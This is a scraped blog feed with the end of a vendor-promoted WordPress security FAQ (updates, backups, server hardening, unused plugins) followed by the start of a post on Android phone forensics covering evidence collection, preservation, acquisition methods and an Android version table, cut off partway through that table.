<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Which is why we created Automate.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
It detects when an upgrade is available for a trusted theme or plugin (you can select all of your plugins and themes, or just the ones you trust), takes a screenshot of your site, automatically backs it up, performs the upgrades, pings your site to make sure it’s not down or broken and then takes a second screenshot and compares it to the original one to make sure the update caused no significant visual changes.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
And then, it immediately sends you an email (although you can have a digest if you like) letting you know what went down.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://cdn4.wpbeginner.com/wp-content/uploads/2016/09/strongpasswords.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://cdn4.wpbeginner.com/wp-content/uploads/2016/09/strongpasswords.jpg" data-original-height="347" data-original-width="520" height="213" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">From Wpbeginner.com</td></tr>
</tbody></table>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">10. Do I need to install WordPress updates? Should I install them immediately?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Absolutely, and of course, Automate updates WordPress itself.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">11. Should I host my own WordPress site?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you don’t, then much (if not all) of the advice in this post isn’t relevant. If you use a platform like WordPress.com or CampusPress, security measures and updates will be taken care of for you. Whereas if you host WordPress yourself, then this post is definitely for you as security should be your number one priority.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you do host WordPress yourself, you get far greater flexibility and the capacity to more easily (and more affordably!) meet you and your clients’ needs.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">12. How often should I backup my WordPress site? Why?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
As often as possible. Although realistically, you should be good with a weekly backup and keeping the last three backups, especially if your site is actively monitored.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
You could also choose to have a separate monthly backup and retain the last six or so files, just in case something happens and you don’t immediately notice.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Good WordPress security tools should alert you to any issues. So generally, a weekly backup is fine. And excellent WordPress security tools will back up your site automatically before every upgrade.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">13. How can I secure my hosting server? Are there certain actions I should take?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you use shared or managed hosting, then that is generally the responsibility of your provider. Just make sure you use a strong random password for your SFTP/control panel login, and enable two-factor authentication if they support it.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you manage your own server or VM (Digital Ocean, AWS, etc.), then it is important you properly configure your firewall rules, SSH access and filesystem permissions, and stay on top of package and kernel updates.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">14. What are the most common WordPress vulnerabilities?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Nine times out of 10, when a WordPress site is hacked, it can be traced back to a vulnerability in a theme, plugin or old version of WordPress core. That is why the single most important thing you can do to protect your site is use themes and plugins from trusted providers who care about security and actively provide updates, and then keep your themes, plugins and core updated! Defender can tell you if you have a version of a theme, plugin or core installed that has a published vulnerability, and our Automate tool can keep them all updated.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">15. Should I remove my deactivated plugins?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Any plugin or theme on your server, whether or not it is active, can be a potential security vulnerability, so you must stay on top of updates for all of them. To lower your attack surface, it is best to remove unused plugins or themes.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">16. What WordPress security tools should I use?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Well, naturally I’ll say Defender first and foremost, but of course there are a range of other security tools you can use. For example, we use <a href="https://www.cloudflare.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Cloudflare</a> extensively, especially on our education products, and there are a wide range of other WAF and SSL providers, such as the absolutely awesome <a href="https://letsencrypt.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Let’s Encrypt</a>.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<br /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<a href="http://opentechnation.blogspot.com/" target="_blank">Please visit her for more guides </a></div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-57316922502091553682017-07-24T02:06:00.000+05:302017-07-24T02:06:10.563+05:30Practical Android Phone Forensics<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
Introduction</h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads//072117_1317_PracticalAn11-1024x0-c-default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads//072117_1317_PracticalAn11-1024x0-c-default.png" data-original-height="456" data-original-width="800" height="182" width="320" /></a></div>
<h1>
</h1>
Today’s world is Android World. Almost 90% of devices are running on
Android, and each one of us is using Android in some or the other way.
There are various devices which run on Android, but Android is widely
used on Smart Phones. Also, if you check the Global Smart Phone Market
Share Android Smart Phone share is 88%. Thus, it is necessary that
Investigators are aware of all the techniques and method used for
extracting data from Android Device.<br />
<h1>
Overview of Mobile Forensic Process</h1>
Mobile forensics is a field of digital forensics which is focused
towards mobile devices which are growing very fast. Due to the
exponential growth of the mobile market, Importance of mobile forensics
has also increased. Mobile phones generally belong to a single person so
analysis of it could reveal lots of personal information.<br />
Due to the rapid growth, it also introduced challenges. The ratio of
new models designed and launched is very high which makes very difficult
to follow similar procedures. Each case or investigation of the new
model needs to consider differently and requires following steps which
could be different and unique to the case. With these challenges in
mobile forensics, syncing mobiles phone to a computer using software
becomes easy. One could extract data like SMS, contacts, installed
applications, GPS data and emails, deleted data.<br />
As per the definition of the carrier in 2006, Digital Evidence is
data that supports or refutes a hypothesis about digital events.
Forensic sound manner should be used while collecting, preserving, and
analyzing digital evidence to present it in court. Preserving mobile
device without altering data is nearly impossible because mobile device
constantly transmits data using the network, Wi-Fi, or Bluetooth. That
is why it is necessary to document each and every small detail about
steps taken starting from seizure, collection, preservation, analysis
with the presentation in court.<br />
<h2>
2.1 Collection</h2>
Below steps are recommended to follow during collection of mobile device<br />
<ul>
<li>Note location from where mobile has been collected. It is good
practice to take the picture using the camera of the location and mobile
phone before starting any progress.</li>
<li>Note the status of the device. Whether it’s powered off or on. If it
is power on then, check the battery status, network status. Check where
the screen is locked.</li>
<li>Search for the SIM package and if any cables are located around</li>
</ul>
<h2>
2.2 Preservation</h2>
Preservation of evidence is a very crucial step in digital forensics.
If it is very important to maintain evidence integrity throughout the
investigation. For mobile forensics below steps are good practice to
follow<br />
<ul>
<li>It is possible that attacker could remotely wipe data or any new
activity could override the existing data. So, the first step should be
to isolate the mobile device from the network.</li>
<li>There are several ways that could be followed according to the
scenario. Forensic Investigator can remove SIM card, Switch to Airplane
mode or Use Faraday’s Bag or Jammer</li>
<li>Chain of Custody – Chain of custody is the document to maintain each
record of the Digital evidence from the collection to presentation. It
includes details like serial no, case no, locker no, investigator’s
name, time and date during each step, details of evidence
transportation. It is crucial because it keeps track of the Digital
evidence.</li>
<li>Hashing – Hashing is the method used to prove the integrity of the
evidence. MD5 or SHA are widely used algorithms to calculate the Hash
values of the evidence. As previously mentioned it is almost impossible
to interact mobile device without altering it. But we could calculate
the hash value of the extracted data through logical extraction or of
the image file extracted through physical extraction.</li>
</ul>
<h2>
2.3 Acquisition</h2>
There are three methods used for the data extraction from the Android devices. Below overview has been given about each.<br />
<ul>
<li>Physical – It is a bit-to-bit copy of the device and allow to
recover deleted data. Unfortunately, with mobile forensic always it is
not possible to use this method.</li>
<li>File system – This method would extract files which are visible at file system level.</li>
<li>Logical – This method allows extracting particular files from the file system like a backup.</li>
<li>Sometimes needs to perform offensive techniques like password cracking and Rooting.</li>
</ul>
<h1>
Android OS Comparison</h1>
Below Table list out the various Android Version and compare important features added in the new version –<br />
<div>
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 127px;"></col>
<col style="width: 175px;"></col>
<col style="width: 278px;"></col>
<col style="width: 293px;"></col>
<col style="width: 158px;"></col>
<col style="width: 98px;"></col></colgroup>
<tbody valign="top">
<tr style="background: black; height: 96px;">
<td style="border-bottom: solid black 0.5pt; border-left: solid black 0.5pt; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Version number</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Version name</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Key user features added</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Key developer features added</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: none; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>Release date</strong></span></td>
<td style="border-bottom: solid black 0.5pt; border-left: none; border-right: solid black 0.5pt; border-top: solid black 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="color: white; font-size: 10pt;"><strong>API Level</strong></span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-7-1-1" target="_top"><span style="font-size: 10pt;"><strong>Android 7.1.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Nougat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Long press on the app icon enable new launch actions</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2016 Dec 5</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">25</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-7-1" target="_top"><span style="font-size: 10pt;"><strong>Android 7.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Nougat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Storage manager improvements<br />
</span>
<span style="font-size: 10pt;">Option to enable fingerprint swipe down gesture<br />
</span><br />
<span style="font-size: 10pt;">Seamless system updates</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Shortcut manager APIs<br />
</span>
<span style="font-size: 10pt;">Keyboard image insertion<br />
</span><br />
<span style="font-size: 10pt;">Multi-endpoint call support<br />
</span><br />
<span style="font-size: 10pt;">Source type support for Visual Voicemail<br />
</span><br />
<span style="font-size: 10pt;">Carrier config options to manage video telephony</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2016 Oct 4</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">25</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-7" target="_top"><span style="font-size: 10pt;"><strong>Android 7.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Nougat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Unicode 9.0<br />
</span>
<span style="font-size: 10pt;">Multi-window mode (PIP, Freeform window)<br />
</span><br />
<span style="font-size: 10pt;">Seamless system updates (with dual system partition)<br />
</span><br />
<span style="font-size: 10pt;">Better performance and code size Compiler</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Sustained Performance Mode (SPM) API<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2016 Aug 22</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">24</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/andriod-6-marshmallow" target="_top"><span style="font-size: 10pt;"><strong>Android 6</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Marshmallow</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">USB Type-C support<br />
</span>
<span style="font-size: 10pt;">Fingerprint Authentication support<br />
</span><br />
<span style="font-size: 10pt;">Better battery life with “deep sleep.”<br />
</span><br />
<span style="font-size: 10pt;">Permissions dashboard<br />
</span><br />
<span style="font-size: 10pt;">Android Pay<br />
</span><br />
<span style="font-size: 10pt;">MIDI support</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">App Permissions management update</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2015 Oct 5</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">23</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-5-1" target="_top"><span style="font-size: 10pt;"><strong>Android 5.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lollipop</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Multiple SIM cards support<br />
</span>
<span style="font-size: 10pt;">Quick settings shortcuts to join Wi-Fi networks or control Bluetooth devices<br />
</span><br />
<span style="font-size: 10pt;">Lock protection if lost or stolen<br />
</span><br />
<span style="font-size: 10pt;">Stability and performance enhancements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2015 Mar 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">22</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-5-0-2" target="_top"><span style="font-size: 10pt;"><strong>Android 5.0.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lollipop</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Performance improvements and bug fixes</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2014 Dec 19</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">21</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-5-0-1" target="_top"><span style="font-size: 10pt;"><strong>Android 5.0.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lollipop</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">bug fixes fix issues with video playback and password failures</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2014 Dec 2</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">21</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-5-lollipop" target="_top"><span style="font-size: 10pt;"><strong>Android 5.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lollipop</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">New design (Material design)<br />
</span>
<span style="font-size: 10pt;">Speed improvement</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Several new API<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2014 Oct 17</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">21</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-4-4" target="_top"><span style="font-size: 10pt;"><strong>Android 4.4.4</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">KitKat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fix Heartbleed / OpenSSL vulnerability</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2014 Jun 23</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">19</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-4-2" target="_top"><span style="font-size: 10pt;"><strong>Android 4.4.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">KitKat</span></td>
